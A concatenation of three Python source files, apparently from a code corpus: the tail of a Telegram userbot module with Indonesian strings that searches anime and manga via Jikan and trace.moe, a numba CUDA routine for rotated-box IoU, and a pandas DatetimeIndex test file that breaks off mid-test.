p_rm = await message.reply("`Mencari Anime...`")
f_mal_id = ""
try:
jikan = jikanpy.AioJikan()
search_res = await jikan.search("anime", query)
f_mal_id = search_res["results"][0]["mal_id"]
except IndexError:
await p_rm.edit(f"`Tidak ada hasil yang ditemukan untuk` **{query}**")
return
except Exception as err:
await p_rm.edit(f"`Menemukan pengecualian yang tidak diketahui :` \n{err}")
return
results_ = await jikan.anime(f_mal_id)
await jikan.close()
await message.delete()
# Get All Info of anime
anime_title = results_["title"]
jap_title = results_["title_japanese"]
eng_title = results_["title_english"]
type_ = results_["type"]
results_["source"]
episodes = results_["episodes"]
status = results_["status"]
results_["aired"].get("string")
results_["duration"]
rating = results_["rating"]
score = results_["score"]
synopsis = results_["synopsis"]
results_["background"]
producer_list = results_["producers"]
studios_list = results_["studios"]
genres_list = results_["genres"]
# Info for Buttons
mal_dir_link = results_["url"]
trailer_link = results_["trailer_url"]
main_poster = ""
telegraph_poster = ""
# Poster Links Search
try:
main_poster = get_poster(anime_title)
except BaseException:
pass
try:
telegraph_poster = getBannerLink(f_mal_id)
except BaseException:
pass
# if not main_poster:
main_poster = telegraph_poster
if not telegraph_poster:
telegraph_poster = main_poster
genress_md = ""
producer_md = ""
studio_md = ""
for i in genres_list:
genress_md += f"{i['name']} "
for i in producer_list:
producer_md += f"[{i['name']}]({i['url']}) "
for i in studios_list:
studio_md += f"[{i['name']}]({i['url']}) "
# Build synopsis telegraph post
html_enc = ""
html_enc += f"<img src = '{telegraph_poster}' title = {anime_title}/>"
html_enc += "<br><b>• Ringkasan : </b></br>"
html_enc += f"<br><em>{synopsis}</em></br>"
synopsis_link = post_to_telegraph(anime_title, html_enc)
# Build captions:
captions = f"""📺 **{anime_title}** - **{eng_title}** - **{jap_title}**
**🎭 Genre :** `{genress_md}`
**🆎 Tipe :** `{type_}`
**🔢 Episode :** `{episodes}`
**📡 Status :** `{status}`
**🔞 Peringkat :** `{rating}`
**💯 Skor :** `{score}`
[📖 Ringkasan]({synopsis_link})
[🎬 Cuplikan]({trailer_link})
[📚 Info selengkapnya]({mal_dir_link})
"""
await p_rm.delete()
await message.client.send_file(message.chat_id, file=main_poster, caption=captions)
@register(outgoing=True, pattern=r"^\.smanga ?(.*)")
async def manga(message):
search_query = message.pattern_match.group(1)
await message.get_reply_message()
await message.edit("`Mencari Manga...`")
jikan = jikanpy.jikan.Jikan()
search_result = jikan.search("manga", search_query)
first_mal_id = search_result["results"][0]["mal_id"]
caption, image = get_anime_manga(first_mal_id, "anime_manga", message.chat_id)
await message.delete()
await message.client.send_file(
message.chat_id, file=image, caption=caption, parse_mode="HTML"
)
@register(outgoing=True, pattern=r"^\.sanime ?(.*)")
async def anime(message):
search_query = message.pattern_match.group(1)
await message.get_reply_message()
await message.edit("`Mencari Anime...`")
jikan = jikanpy.jikan.Jikan()
search_result = jikan.search("anime", search_query)
first_mal_id = search_result["results"][0]["mal_id"]
caption, image = get_anime_manga(first_mal_id, "anime_anime", message.chat_id)
try:
await message.delete()
await message.client.send_file(
message.chat_id, file=image, caption=caption, parse_mode="HTML"
)
except BaseException:
image = getBannerLink(first_mal_id, False)
await message.client.send_file(
message.chat_id, file=image, caption=caption, parse_mode="HTML"
)
@register(outgoing=True, pattern=r"^\.whatanime")
async def whatanime(e):
media = e.media
if not media:
r = await e.get_reply_message()
media = getattr(r, "media", None)
if not media:
await e.edit("`Dibutuhkan media`")
return
ig = is_gif(media) or is_video(media)
if not is_image(media) and not ig:
await e.edit("`Media harus berupa gambar, gif atau video`")
return
filename = "file.jpg"
if not ig and isinstance(media, MessageMediaDocument):
attribs = media.document.attributes
for i in attribs:
if isinstance(i, DocumentAttributeFilename):
filename = i.file_name
break
await e.edit("`Mengunduh gambar...`")
content = await e.client.download_media(media, bytes, thumb=-1 if ig else None)
await e.edit("`Mencari hasil...`")
file = memory_file(filename, content)
async with aiohttp.ClientSession() as session:
url = "https://trace.moe/api/search"
async with session.post(url, data={"image": file}) as raw_resp0:
resp0 = await raw_resp0.text()
js0 = json.loads(resp0)["docs"]
if not js0:
await e.edit("`Tidak ada hasil yang ditemukan.`")
return
js0 = js0[0]
text = f'<b>{html.escape(js0["title_romaji"])}'
if js0["title_native"]:
text += f' ({html.escape(js0["title_native"])})'
text += "</b>\n"
if js0["episode"]:
text += f'<b>Episode :</b> {html.escape(str(js0["episode"]))}\n'
percent = round(js0["similarity"] * 100, 2)
text += f"<b>Kesamaan :</b> {percent}%\n"
dt = pendulum.from_timestamp(js0["at"])
text += f"<b>Di :</b> {html.escape(dt.to_time_string())}"
await e.edit(text, parse_mode="html")
dt0 = pendulum.from_timestamp(js0["from"])
dt1 = pendulum.from_timestamp(js0["to"])
ctext = (
f"{html.escape(dt0.to_time_string())} - {html.escape(dt1.to_time_string())}"
)
url = (
"https://media.trace.moe/video/"
f'{urlencode(str(js0["anilist_id"]))}' + "/"
f'{urlencode(js0["filename"])}'
f'?t={urlencode(str(js0["at"]))}'
f'&token={urlencode(js0["tokenthumb"])}'
)
async with session.get(url) as raw_resp1:
file = memory_file("preview.mp4", await raw_resp1.read())
try:
await e.reply(ctext, file=file, parse_mode="html")
except FilePartsInvalidError:
await e.reply("`Tidak dapat mengirim pratinjau.`")
def memory_file(name=None, contents=None, *, bytes=True):
if isinstance(contents, str) and bytes:
contents = contents.encode()
file = BytesIO() if bytes else StringIO()
if name:
file.name = name
if contents:
file.write(contents)
file.seek(0)
return file
def is_gif(file):
    # Workaround: telethon.utils.is_gif does not cover this case reliably,
    # so check for the DocumentAttributeAnimated attribute directly.
if not is_video(file):
return False
return DocumentAttributeAnimated() in getattr(file, "document", file).attributes
CMD_HELP.update(
{
"anime": "`.anilist [anime]`"
"\n➥ Dapatkan informasi anime."
"\n\n`.anime [anime]`"
"\n➥ Dapatkan informasi Anime."
"\n\n`.manga [nama manga]`"
"\n➥ Dapatkan informasi Manga."
"\n\n`.akaizoku/.akayo [nama anime]`"
"\n➥ Dapatkan tautan unduhan Anime."
"\n\n`.char [nama karakter]`"
"\n➥ Dapatkan informasi karakter."
"\n\n`.upcoming`"
"\n➥ Dapatkan informasi Anime Mendatang."
"\n\n`.scanime` / `.sanime [anime]`"
"\n➥ Mencari anime."
"\n\n`.smanga [manga]`"
"\n➥ Mencari manga."
"\n\n`.whatanime [balas gambar adegan anime]`"
"\n➥ Temukan anime dari file media."
}
)
|
the-stack_0_25203
|
import math
import numba
import numpy as np
from numba import cuda
@numba.jit(nopython=True)
def div_up(m, n):
return m // n + (m % n > 0)
@cuda.jit('(float32[:], float32[:], float32[:])', device=True, inline=True)
def trangle_area(a, b, c):
return ((a[0] - c[0]) * (b[1] - c[1]) - (a[1] - c[1]) *
(b[0] - c[0])) / 2.0
@cuda.jit('(float32[:], int32)', device=True, inline=True)
def area(int_pts, num_of_inter):
area_val = 0.0
for i in range(num_of_inter - 2):
area_val += abs(
trangle_area(int_pts[:2], int_pts[2 * i + 2:2 * i + 4],
int_pts[2 * i + 4:2 * i + 6]))
return area_val
@cuda.jit('(float32[:], int32)', device=True, inline=True)
def sort_vertex_in_convex_polygon(int_pts, num_of_inter):
if num_of_inter > 0:
center = cuda.local.array((2, ), dtype=numba.float32)
center[:] = 0.0
for i in range(num_of_inter):
center[0] += int_pts[2 * i]
center[1] += int_pts[2 * i + 1]
center[0] /= num_of_inter
center[1] /= num_of_inter
v = cuda.local.array((2, ), dtype=numba.float32)
vs = cuda.local.array((16, ), dtype=numba.float32)
for i in range(num_of_inter):
v[0] = int_pts[2 * i] - center[0]
v[1] = int_pts[2 * i + 1] - center[1]
d = math.sqrt(v[0] * v[0] + v[1] * v[1])
v[0] = v[0] / d
v[1] = v[1] / d
if v[1] < 0:
v[0] = -2 - v[0]
vs[i] = v[0]
j = 0
temp = 0
for i in range(1, num_of_inter):
if vs[i - 1] > vs[i]:
temp = vs[i]
tx = int_pts[2 * i]
ty = int_pts[2 * i + 1]
j = i
while j > 0 and vs[j - 1] > temp:
vs[j] = vs[j - 1]
int_pts[j * 2] = int_pts[j * 2 - 2]
int_pts[j * 2 + 1] = int_pts[j * 2 - 1]
j -= 1
vs[j] = temp
int_pts[j * 2] = tx
int_pts[j * 2 + 1] = ty
@cuda.jit(
'(float32[:], float32[:], int32, int32, float32[:])',
device=True,
inline=True)
def line_segment_intersection(pts1, pts2, i, j, temp_pts):
A = cuda.local.array((2, ), dtype=numba.float32)
B = cuda.local.array((2, ), dtype=numba.float32)
C = cuda.local.array((2, ), dtype=numba.float32)
D = cuda.local.array((2, ), dtype=numba.float32)
A[0] = pts1[2 * i]
A[1] = pts1[2 * i + 1]
B[0] = pts1[2 * ((i + 1) % 4)]
B[1] = pts1[2 * ((i + 1) % 4) + 1]
C[0] = pts2[2 * j]
C[1] = pts2[2 * j + 1]
D[0] = pts2[2 * ((j + 1) % 4)]
D[1] = pts2[2 * ((j + 1) % 4) + 1]
BA0 = B[0] - A[0]
BA1 = B[1] - A[1]
DA0 = D[0] - A[0]
CA0 = C[0] - A[0]
DA1 = D[1] - A[1]
CA1 = C[1] - A[1]
acd = DA1 * CA0 > CA1 * DA0
bcd = (D[1] - B[1]) * (C[0] - B[0]) > (C[1] - B[1]) * (D[0] - B[0])
if acd != bcd:
abc = CA1 * BA0 > BA1 * CA0
abd = DA1 * BA0 > BA1 * DA0
if abc != abd:
DC0 = D[0] - C[0]
DC1 = D[1] - C[1]
ABBA = A[0] * B[1] - B[0] * A[1]
CDDC = C[0] * D[1] - D[0] * C[1]
DH = BA1 * DC0 - BA0 * DC1
Dx = ABBA * DC0 - BA0 * CDDC
Dy = ABBA * DC1 - BA1 * CDDC
temp_pts[0] = Dx / DH
temp_pts[1] = Dy / DH
return True
return False
@cuda.jit(
'(float32[:], float32[:], int32, int32, float32[:])',
device=True,
inline=True)
def line_segment_intersection_v1(pts1, pts2, i, j, temp_pts):
a = cuda.local.array((2, ), dtype=numba.float32)
b = cuda.local.array((2, ), dtype=numba.float32)
c = cuda.local.array((2, ), dtype=numba.float32)
d = cuda.local.array((2, ), dtype=numba.float32)
a[0] = pts1[2 * i]
a[1] = pts1[2 * i + 1]
b[0] = pts1[2 * ((i + 1) % 4)]
b[1] = pts1[2 * ((i + 1) % 4) + 1]
c[0] = pts2[2 * j]
c[1] = pts2[2 * j + 1]
d[0] = pts2[2 * ((j + 1) % 4)]
d[1] = pts2[2 * ((j + 1) % 4) + 1]
area_abc = trangle_area(a, b, c)
area_abd = trangle_area(a, b, d)
if area_abc * area_abd >= 0:
return False
area_cda = trangle_area(c, d, a)
area_cdb = area_cda + area_abc - area_abd
if area_cda * area_cdb >= 0:
return False
t = area_cda / (area_abd - area_abc)
dx = t * (b[0] - a[0])
dy = t * (b[1] - a[1])
temp_pts[0] = a[0] + dx
temp_pts[1] = a[1] + dy
return True
@cuda.jit('(float32, float32, float32[:])', device=True, inline=True)
def point_in_quadrilateral(pt_x, pt_y, corners):
ab0 = corners[2] - corners[0]
ab1 = corners[3] - corners[1]
ad0 = corners[6] - corners[0]
ad1 = corners[7] - corners[1]
ap0 = pt_x - corners[0]
ap1 = pt_y - corners[1]
abab = ab0 * ab0 + ab1 * ab1
abap = ab0 * ap0 + ab1 * ap1
adad = ad0 * ad0 + ad1 * ad1
adap = ad0 * ap0 + ad1 * ap1
return abab >= abap and abap >= 0 and adad >= adap and adap >= 0
@cuda.jit('(float32[:], float32[:], float32[:])', device=True, inline=True)
def quadrilateral_intersection(pts1, pts2, int_pts):
num_of_inter = 0
for i in range(4):
if point_in_quadrilateral(pts1[2 * i], pts1[2 * i + 1], pts2):
int_pts[num_of_inter * 2] = pts1[2 * i]
int_pts[num_of_inter * 2 + 1] = pts1[2 * i + 1]
num_of_inter += 1
if point_in_quadrilateral(pts2[2 * i], pts2[2 * i + 1], pts1):
int_pts[num_of_inter * 2] = pts2[2 * i]
int_pts[num_of_inter * 2 + 1] = pts2[2 * i + 1]
num_of_inter += 1
temp_pts = cuda.local.array((2, ), dtype=numba.float32)
for i in range(4):
for j in range(4):
has_pts = line_segment_intersection(pts1, pts2, i, j, temp_pts)
if has_pts:
int_pts[num_of_inter * 2] = temp_pts[0]
int_pts[num_of_inter * 2 + 1] = temp_pts[1]
num_of_inter += 1
return num_of_inter
@cuda.jit('(float32[:], float32[:])', device=True, inline=True)
def rbbox_to_corners(corners, rbbox):
# generate clockwise corners and rotate it clockwise
angle = rbbox[4]
a_cos = math.cos(angle)
a_sin = math.sin(angle)
center_x = rbbox[0]
center_y = rbbox[1]
x_d = rbbox[2]
y_d = rbbox[3]
corners_x = cuda.local.array((4, ), dtype=numba.float32)
corners_y = cuda.local.array((4, ), dtype=numba.float32)
corners_x[0] = -x_d / 2
corners_x[1] = -x_d / 2
corners_x[2] = x_d / 2
corners_x[3] = x_d / 2
corners_y[0] = -y_d / 2
corners_y[1] = y_d / 2
corners_y[2] = y_d / 2
corners_y[3] = -y_d / 2
for i in range(4):
        corners[2 * i] = a_cos * corners_x[i] + a_sin * corners_y[i] + center_x
        corners[2 * i + 1] = -a_sin * corners_x[i] + a_cos * corners_y[i] + center_y
@cuda.jit('(float32[:], float32[:])', device=True, inline=True)
def inter(rbbox1, rbbox2):
corners1 = cuda.local.array((8, ), dtype=numba.float32)
corners2 = cuda.local.array((8, ), dtype=numba.float32)
intersection_corners = cuda.local.array((16, ), dtype=numba.float32)
rbbox_to_corners(corners1, rbbox1)
rbbox_to_corners(corners2, rbbox2)
num_intersection = quadrilateral_intersection(corners1, corners2,
intersection_corners)
sort_vertex_in_convex_polygon(intersection_corners, num_intersection)
# print(intersection_corners.reshape([-1, 2])[:num_intersection])
return area(intersection_corners, num_intersection)
@cuda.jit('(float32[:], float32[:], int32)', device=True, inline=True)
def devRotateIoUEval(rbox1, rbox2, criterion=-1):
area1 = rbox1[2] * rbox1[3]
area2 = rbox2[2] * rbox2[3]
area_inter = inter(rbox1, rbox2)
if criterion == -1:
return area_inter / (area1 + area2 - area_inter)
elif criterion == 0:
return area_inter / area1
elif criterion == 1:
return area_inter / area2
else:
return area_inter
@cuda.jit('(int64, int64, float32[:], float32[:], float32[:], int32)', fastmath=False)
def rotate_iou_kernel_eval(N, K, dev_boxes, dev_query_boxes, dev_iou, criterion=-1):
threadsPerBlock = 8 * 8
row_start = cuda.blockIdx.x
col_start = cuda.blockIdx.y
tx = cuda.threadIdx.x
row_size = min(N - row_start * threadsPerBlock, threadsPerBlock)
col_size = min(K - col_start * threadsPerBlock, threadsPerBlock)
block_boxes = cuda.shared.array(shape=(64 * 5, ), dtype=numba.float32)
block_qboxes = cuda.shared.array(shape=(64 * 5, ), dtype=numba.float32)
dev_query_box_idx = threadsPerBlock * col_start + tx
dev_box_idx = threadsPerBlock * row_start + tx
if (tx < col_size):
block_qboxes[tx * 5 + 0] = dev_query_boxes[dev_query_box_idx * 5 + 0]
block_qboxes[tx * 5 + 1] = dev_query_boxes[dev_query_box_idx * 5 + 1]
block_qboxes[tx * 5 + 2] = dev_query_boxes[dev_query_box_idx * 5 + 2]
block_qboxes[tx * 5 + 3] = dev_query_boxes[dev_query_box_idx * 5 + 3]
block_qboxes[tx * 5 + 4] = dev_query_boxes[dev_query_box_idx * 5 + 4]
if (tx < row_size):
block_boxes[tx * 5 + 0] = dev_boxes[dev_box_idx * 5 + 0]
block_boxes[tx * 5 + 1] = dev_boxes[dev_box_idx * 5 + 1]
block_boxes[tx * 5 + 2] = dev_boxes[dev_box_idx * 5 + 2]
block_boxes[tx * 5 + 3] = dev_boxes[dev_box_idx * 5 + 3]
block_boxes[tx * 5 + 4] = dev_boxes[dev_box_idx * 5 + 4]
cuda.syncthreads()
if tx < row_size:
for i in range(col_size):
offset = row_start * threadsPerBlock * K + col_start * threadsPerBlock + tx * K + i
dev_iou[offset] = devRotateIoUEval(block_qboxes[i * 5:i * 5 + 5],
block_boxes[tx * 5:tx * 5 + 5], criterion)
def rotate_iou_gpu_eval(boxes, query_boxes, criterion=-1, device_id=0):
    """Rotated box IoU evaluated on the GPU, roughly 500x faster than the CPU
    version (about 5 ms in one example with numba.cuda code).
    Converted from [this project](
    https://github.com/hongzhenwang/RRPN-revise/tree/master/pcdet/rotation).
    Args:
        boxes (float tensor: [N, 5]): rbboxes. format: centers, dims,
            angles(clockwise when positive)
        query_boxes (float tensor: [K, 5]): rbboxes in the same format as boxes.
        criterion (int, optional): Defaults to -1 (intersection over union);
            0 or 1 normalize the intersection by the area of one of the two
            boxes instead of by the union.
        device_id (int, optional): Defaults to 0. CUDA device to run the kernel on.
    Returns:
        np.ndarray: [N, K] array of pairwise overlap values.
    """
box_dtype = boxes.dtype
boxes = boxes.astype(np.float32)
query_boxes = query_boxes.astype(np.float32)
N = boxes.shape[0]
K = query_boxes.shape[0]
iou = np.zeros((N, K), dtype=np.float32)
if N == 0 or K == 0:
return iou
threadsPerBlock = 8 * 8
cuda.select_device(device_id)
blockspergrid = (div_up(N, threadsPerBlock), div_up(K, threadsPerBlock))
stream = cuda.stream()
with stream.auto_synchronize():
boxes_dev = cuda.to_device(boxes.reshape([-1]), stream)
query_boxes_dev = cuda.to_device(query_boxes.reshape([-1]), stream)
iou_dev = cuda.to_device(iou.reshape([-1]), stream)
rotate_iou_kernel_eval[blockspergrid, threadsPerBlock, stream](
N, K, boxes_dev, query_boxes_dev, iou_dev, criterion)
iou_dev.copy_to_host(iou.reshape([-1]), stream=stream)
    return iou.astype(box_dtype)
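# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original file): illustrates the
# [x_center, y_center, x_size, y_size, angle] box layout consumed by
# rotate_iou_gpu_eval (angles in radians, as used by rbbox_to_corners).
# Running it requires a CUDA-capable GPU and a working numba CUDA setup; the
# box values below are made up for illustration only.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    example_boxes = np.array([[0.0, 0.0, 4.0, 2.0, 0.0],
                              [1.0, 1.0, 4.0, 2.0, 0.3]], dtype=np.float32)
    example_queries = np.array([[0.5, 0.0, 4.0, 2.0, 0.0]], dtype=np.float32)
    overlaps = rotate_iou_gpu_eval(example_boxes, example_queries)  # shape (2, 1)
    print(overlaps)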
|
the-stack_0_25204
|
from datetime import date
import dateutil
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, Timestamp, date_range, offsets
import pandas._testing as tm
randn = np.random.randn
class TestDatetimeIndex:
def test_roundtrip_pickle_with_tz(self):
# GH 8367
# round-trip of timezone
index = date_range("20130101", periods=3, tz="US/Eastern", name="foo")
unpickled = tm.round_trip_pickle(index)
tm.assert_index_equal(index, unpickled)
def test_reindex_preserves_tz_if_target_is_empty_list_or_array(self):
# GH7774
index = date_range("20130101", periods=3, tz="US/Eastern")
assert str(index.reindex([])[0].tz) == "US/Eastern"
assert str(index.reindex(np.array([]))[0].tz) == "US/Eastern"
def test_time_loc(self): # GH8667
from datetime import time
from pandas._libs.index import _SIZE_CUTOFF
ns = _SIZE_CUTOFF + np.array([-100, 100], dtype=np.int64)
key = time(15, 11, 30)
start = key.hour * 3600 + key.minute * 60 + key.second
step = 24 * 3600
for n in ns:
idx = pd.date_range("2014-11-26", periods=n, freq="S")
ts = pd.Series(np.random.randn(n), index=idx)
i = np.arange(start, n, step)
tm.assert_numpy_array_equal(ts.index.get_loc(key), i, check_dtype=False)
tm.assert_series_equal(ts[key], ts.iloc[i])
left, right = ts.copy(), ts.copy()
left[key] *= -10
right.iloc[i] *= -10
tm.assert_series_equal(left, right)
def test_time_overflow_for_32bit_machines(self):
# GH8943. On some machines NumPy defaults to np.int32 (for example,
# 32-bit Linux machines). In the function _generate_regular_range
# found in tseries/index.py, `periods` gets multiplied by `strides`
# (which has value 1e9) and since the max value for np.int32 is ~2e9,
# and since those machines won't promote np.int32 to np.int64, we get
# overflow.
periods = np.int_(1000)
idx1 = pd.date_range(start="2000", periods=periods, freq="S")
assert len(idx1) == periods
idx2 = pd.date_range(end="2000", periods=periods, freq="S")
assert len(idx2) == periods
def test_nat(self):
assert DatetimeIndex([np.nan])[0] is pd.NaT
def test_week_of_month_frequency(self):
# GH 5348: "ValueError: Could not evaluate WOM-1SUN" shouldn't raise
d1 = date(2002, 9, 1)
d2 = date(2013, 10, 27)
d3 = date(2012, 9, 30)
idx1 = DatetimeIndex([d1, d2])
idx2 = DatetimeIndex([d3])
result_append = idx1.append(idx2)
expected = DatetimeIndex([d1, d2, d3])
tm.assert_index_equal(result_append, expected)
result_union = idx1.union(idx2)
expected = DatetimeIndex([d1, d3, d2])
tm.assert_index_equal(result_union, expected)
# GH 5115
result = date_range("2013-1-1", periods=4, freq="WOM-1SAT")
dates = ["2013-01-05", "2013-02-02", "2013-03-02", "2013-04-06"]
expected = DatetimeIndex(dates, freq="WOM-1SAT")
tm.assert_index_equal(result, expected)
def test_hash_error(self):
index = date_range("20010101", periods=10)
with pytest.raises(
TypeError, match=f"unhashable type: '{type(index).__name__}'"
):
hash(index)
def test_stringified_slice_with_tz(self):
# GH#2658
start = "2013-01-07"
idx = date_range(start=start, freq="1d", periods=10, tz="US/Eastern")
df = DataFrame(np.arange(10), index=idx)
df["2013-01-14 23:44:34.437768-05:00":] # no exception here
def test_append_nondatetimeindex(self):
rng = date_range("1/1/2000", periods=10)
idx = Index(["a", "b", "c", "d"])
result = rng.append(idx)
assert isinstance(result[0], Timestamp)
def test_map(self):
rng = date_range("1/1/2000", periods=10)
f = lambda x: x.strftime("%Y%m%d")
result = rng.map(f)
exp = Index([f(x) for x in rng], dtype="<U8")
tm.assert_index_equal(result, exp)
def test_map_fallthrough(self, capsys):
# GH#22067, check we don't get warnings about silently ignored errors
dti = date_range("2017-01-01", "2018-01-01", freq="B")
dti.map(lambda x: pd.Period(year=x.year, month=x.month, freq="M"))
captured = capsys.readouterr()
assert captured.err == ""
def test_iteration_preserves_tz(self):
# see gh-8890
index = date_range("2012-01-01", periods=3, freq="H", tz="US/Eastern")
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result == expected
index = date_range(
"2012-01-01", periods=3, freq="H", tz=dateutil.tz.tzoffset(None, -28800)
)
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result._repr_base == expected._repr_base
assert result == expected
# 9100
index = pd.DatetimeIndex(
["2014-12-01 03:32:39.987000-08:00", "2014-12-01 04:12:34.987000-08:00"]
)
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result._repr_base == expected._repr_base
assert result == expected
@pytest.mark.parametrize("periods", [0, 9999, 10000, 10001])
def test_iteration_over_chunksize(self, periods):
# GH21012
index = date_range("2000-01-01 00:00:00", periods=periods, freq="min")
num = 0
for stamp in index:
assert index[num] == stamp
num += 1
assert num == len(index)
def test_misc_coverage(self):
rng = date_range("1/1/2000", periods=5)
result = rng.groupby(rng.day)
assert isinstance(list(result.values())[0][0], Timestamp)
idx = DatetimeIndex(["2000-01-03", "2000-01-01", "2000-01-02"])
assert not idx.equals(list(idx))
non_datetime = Index(list("abc"))
assert not idx.equals(list(non_datetime))
def test_string_index_series_name_converted(self):
# #1644
df = DataFrame(np.random.randn(10, 4), index=date_range("1/1/2000", periods=10))
result = df.loc["1/3/2000"]
assert result.name == df.index[2]
result = df.T["1/3/2000"]
assert result.name == df.index[2]
def test_argmin_argmax(self):
idx = DatetimeIndex(["2000-01-04", "2000-01-01", "2000-01-02"])
assert idx.argmin() == 1
assert idx.argmax() == 0
def test_sort_values(self):
idx = DatetimeIndex(["2000-01-04", "2000-01-01", "2000-01-02"])
ordered = idx.sort_values()
assert ordered.is_monotonic
ordered = idx.sort_values(ascending=False)
assert ordered[::-1].is_monotonic
ordered, dexer = idx.sort_values(return_indexer=True)
assert ordered.is_monotonic
tm.assert_numpy_array_equal(dexer, np.array([1, 2, 0], dtype=np.intp))
ordered, dexer = idx.sort_values(return_indexer=True, ascending=False)
assert ordered[::-1].is_monotonic
tm.assert_numpy_array_equal(dexer, np.array([0, 2, 1], dtype=np.intp))
def test_map_bug_1677(self):
index = DatetimeIndex(["2012-04-25 09:30:00.393000"])
f = index.asof
result = index.map(f)
expected = Index([f(index[0])])
tm.assert_index_equal(result, expected)
def test_groupby_function_tuple_1677(self):
df = DataFrame(np.random.rand(100), index=date_range("1/1/2000", periods=100))
monthly_group = df.groupby(lambda x: (x.year, x.month))
result = monthly_group.mean()
assert isinstance(result.index[0], tuple)
def test_append_numpy_bug_1681(self):
# another datetime64 bug
dr = date_range("2011/1/1", "2012/1/1", freq="W-FRI")
a = DataFrame()
c = DataFrame({"A": "foo", "B": dr}, index=dr)
result = a.append(c)
assert (result["B"] == dr).all()
def test_isin(self):
index = tm.makeDateIndex(4)
result = index.isin(index)
assert result.all()
result = index.isin(list(index))
assert result.all()
tm.assert_almost_equal(
index.isin([index[2], 5]), np.array([False, False, True, False])
)
def assert_index_parameters(self, index):
assert index.freq == "40960N"
assert index.inferred_freq == "40960N"
def test_ns_index(self):
nsamples = 400
ns = int(1e9 / 24414)
dtstart = np.datetime64("2012-09-20T00:00:00")
dt = dtstart + np.arange(nsamples) * np.timedelta64(ns, "ns")
freq = ns * offsets.Nano()
index = pd.DatetimeIndex(dt, freq=freq, name="time")
self.assert_index_parameters(index)
new_index = pd.date_range(start=index[0], end=index[-1], freq=index.freq)
self.assert_index_parameters(new_index)
def test_factorize(self):
idx1 = DatetimeIndex(
["2014-01", "2014-01", "2014-02", "2014-02", "2014-03", "2014-03"]
)
exp_arr = np.array([0, 0, 1, 1, 2, 2], dtype=np.intp)
exp_idx = DatetimeIndex(["2014-01", "2014-02", "2014-03"])
arr, idx = idx1.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
arr, idx = idx1.factorize(sort=True)
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
# tz must be preserved
idx1 = idx1.tz_localize("Asia/Tokyo")
exp_idx = exp_idx.tz_localize("Asia/Tokyo")
arr, idx = idx1.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
idx2 = pd.DatetimeIndex(
["2014-03", "2014-03", "2014-02", "2014-01", "2014-03", "2014-01"]
)
exp_arr = np.array([2, 2, 1, 0, 2, 0], dtype=np.intp)
exp_idx = DatetimeIndex(["2014-01", "2014-02", "2014-03"])
arr, idx = idx2.factorize(sort=True)
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
exp_arr = np.array([0, 0, 1, 2, 0, 2], dtype=np.intp)
exp_idx = DatetimeIndex(["2014-03", "2014-02", "2014-01"])
arr, idx = idx2.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
# freq must be preserved
idx3 = date_range("2000-01", periods=4, freq="M", tz="Asia/Tokyo")
exp_arr = np.array([0, 1, 2, 3], dtype=np.intp)
arr, idx = idx3.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, idx3)
def test_factorize_tz(self, tz_naive_fixture):
tz = tz_naive_fixture
# GH#13750
base = pd.date_range("2016-11-05", freq="H", periods=100, tz=tz)
idx = base.repeat(5)
exp_arr = np.arange(100, dtype=np.intp).repeat(5)
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(res, base)
def test_factorize_dst(self):
# GH 13750
idx = pd.date_range("2016-11-06", freq="H", periods=12, tz="US/Eastern")
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, np.arange(12, dtype=np.intp))
tm.assert_index_equal(res, idx)
idx = pd.date_range("2016-06-13", freq="H", periods=12, tz="US/Eastern")
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, np.arange(12, dtype=np.intp))
tm.assert_index_equal(res, idx)
@pytest.mark.parametrize(
"arr, expected",
[
(pd.DatetimeIndex(["2017", "2017"]), pd.DatetimeIndex(["2017"])),
(
pd.DatetimeIndex(["2017", "2017"], tz="US/Eastern"),
pd.DatetimeIndex(["2017"], tz="US/Eastern"),
),
],
)
def test_unique(self, arr, expected):
result = arr.unique()
tm.assert_index_equal(result, expected)
# GH 21737
# Ensure the underlying data is consistent
assert result[0] == expected[0]
def test_asarray_tz_naive(self):
# This shouldn't produce a warning.
idx = pd.date_range("2000", periods=2)
# M8[ns] by default
result = np.asarray(idx)
expected = np.array(["2000-01-01", "2000-01-02"], dtype="M8[ns]")
tm.assert_numpy_array_equal(result, expected)
# optionally, object
result = np.asarray(idx, dtype=object)
expected = np.array([pd.Timestamp("2000-01-01"), pd.Timestamp("2000-01-02")])
tm.assert_numpy_array_equal(result, expected)
def test_asarray_tz_aware(self):
tz = "US/Central"
idx = pd.date_range("2000", periods=2, tz=tz)
expected = np.array(["2000-01-01T06", "2000-01-02T06"], dtype="M8[ns]")
result = np.asarray(idx, dtype="datetime64[ns]")
tm.assert_numpy_array_equal(result, expected)
# Old behavior with no warning
result = np.asarray(idx, dtype="M8[ns]")
tm.assert_numpy_array_equal(result, expected)
# Future behavior with no warning
expected = np.array(
[pd.Timestamp("2000-01-01", tz=tz), pd.Timestamp("2000-01-02", tz=tz)]
)
result = np.asarray(idx, dtype=object)
tm.assert_numpy_array_equal(result, expected)
def test_to_frame_datetime_tz(self):
# GH 25809
idx = date_range(start="2019-01-01", end="2019-01-30", freq="D", tz="UTC")
result = idx.to_frame()
expected = DataFrame(idx, index=idx)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("name", [None, "name"])
def test_index_map(self, name):
# see GH20990
count = 6
index = pd.date_range("2018-01-01", periods=count, freq="M", name=name).map(
lambda x: (x.year, x.month)
)
exp_index = pd.MultiIndex.from_product(
((2018,), range(1, 7)), names=[name, name]
)
